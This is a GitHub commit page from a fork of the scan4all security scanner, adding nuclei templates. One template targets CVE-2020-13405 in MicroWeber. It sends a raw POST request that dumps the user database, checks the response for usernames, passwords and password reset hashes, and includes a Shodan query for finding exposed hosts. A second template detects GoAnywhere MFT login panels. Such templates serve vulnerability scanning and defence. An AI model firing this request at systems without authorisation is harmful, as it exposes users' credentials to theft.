forked from GhostTroops/scan4all
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
up goby_pocs and nuclei_templates 2022-07-29
- Loading branch information
Showing
96 changed files
with
2,283 additions
and
1,949 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,12 +1,12 @@ | ||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | ||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| | ||
| cve | 1294 | daffainfo | 605 | cves | 1277 | info | 1352 | http | 3554 | | ||
| panel | 591 | dhiyaneshdk | 503 | exposed-panels | 600 | high | 938 | file | 76 | | ||
| lfi | 486 | pikpikcu | 321 | vulnerabilities | 493 | medium | 766 | network | 50 | | ||
| xss | 439 | pdteam | 269 | technologies | 266 | critical | 436 | dns | 17 | | ||
| wordpress | 401 | geeknik | 187 | exposures | 254 | low | 211 | | | | ||
| exposure | 355 | dwisiswant0 | 169 | misconfiguration | 207 | unknown | 7 | | | | ||
| cve2021 | 322 | 0x_akoko | 154 | token-spray | 206 | | | | | | ||
| rce | 313 | princechaddha | 147 | workflows | 187 | | | | | | ||
| wp-plugin | 297 | pussycat0x | 128 | default-logins | 101 | | | | | | ||
| tech | 282 | gy741 | 126 | file | 76 | | | | | | ||
| cve | 1308 | daffainfo | 614 | cves | 1291 | info | 1368 | http | 3593 | | ||
| panel | 595 | dhiyaneshdk | 504 | exposed-panels | 604 | high | 943 | file | 76 | | ||
| lfi | 487 | pikpikcu | 322 | vulnerabilities | 500 | medium | 778 | network | 50 | | ||
| xss | 445 | pdteam | 269 | technologies | 267 | critical | 442 | dns | 17 | | ||
| wordpress | 406 | geeknik | 187 | exposures | 255 | low | 211 | | | | ||
| exposure | 360 | dwisiswant0 | 169 | token-spray | 215 | unknown | 7 | | | | ||
| cve2021 | 322 | 0x_akoko | 155 | misconfiguration | 210 | | | | | | ||
| rce | 317 | princechaddha | 147 | workflows | 187 | | | | | | ||
| wp-plugin | 301 | pussycat0x | 128 | default-logins | 101 | | | | | | ||
| tech | 283 | gy741 | 126 | file | 76 | | | | | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,47 @@ | ||
id: CVE-2020-13405 | ||
|
||
info: | ||
name: MicroWeber - Unauthenticated User Database Disclosure | ||
author: ritikchaddha,amit-jd | ||
severity: high | ||
description: | | ||
The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML. | ||
reference: | ||
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405 | ||
- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2020-13405 | ||
cwe-id: CWE-306 | ||
metadata: | ||
shodan-query: http.html:"microweber" | ||
verified: "true" | ||
tags: cve,cve2020,microweber,unauth,disclosure | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /module/ HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | ||
Referer: {{BaseURL}}admin/view:modules/load_module:users | ||
module={{endpoint}} | ||
payloads: | ||
endpoint: | ||
- "users/controller" | ||
- "modules/users/controller" | ||
- "/modules/users/controller" | ||
|
||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body,"username")' | ||
- 'contains(body,"password")' | ||
- 'contains(body,"password_reset_hash")' | ||
- 'status_code==200' | ||
- 'contains(all_headers,"text/html")' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
27 changes: 27 additions & 0 deletions
27
config/nuclei-templates/exposed-panels/goanywhere-mft-login.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: goanywhere-mft-login | ||
|
||
info: | ||
name: GoAnywhere Managed File Transfer Login Panel | ||
author: ritikchaddha | ||
severity: info | ||
metadata: | ||
verified: true | ||
shodan-query: http.html:"GoAnywhere Managed File Transfer" | ||
tags: panel,goanywhere,login,filetransfer | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/goanywhere/auth/Login.xhtml" | ||
|
||
redirects: true | ||
max-redirects: 2 | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "GoAnywhere Managed File Transfer" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.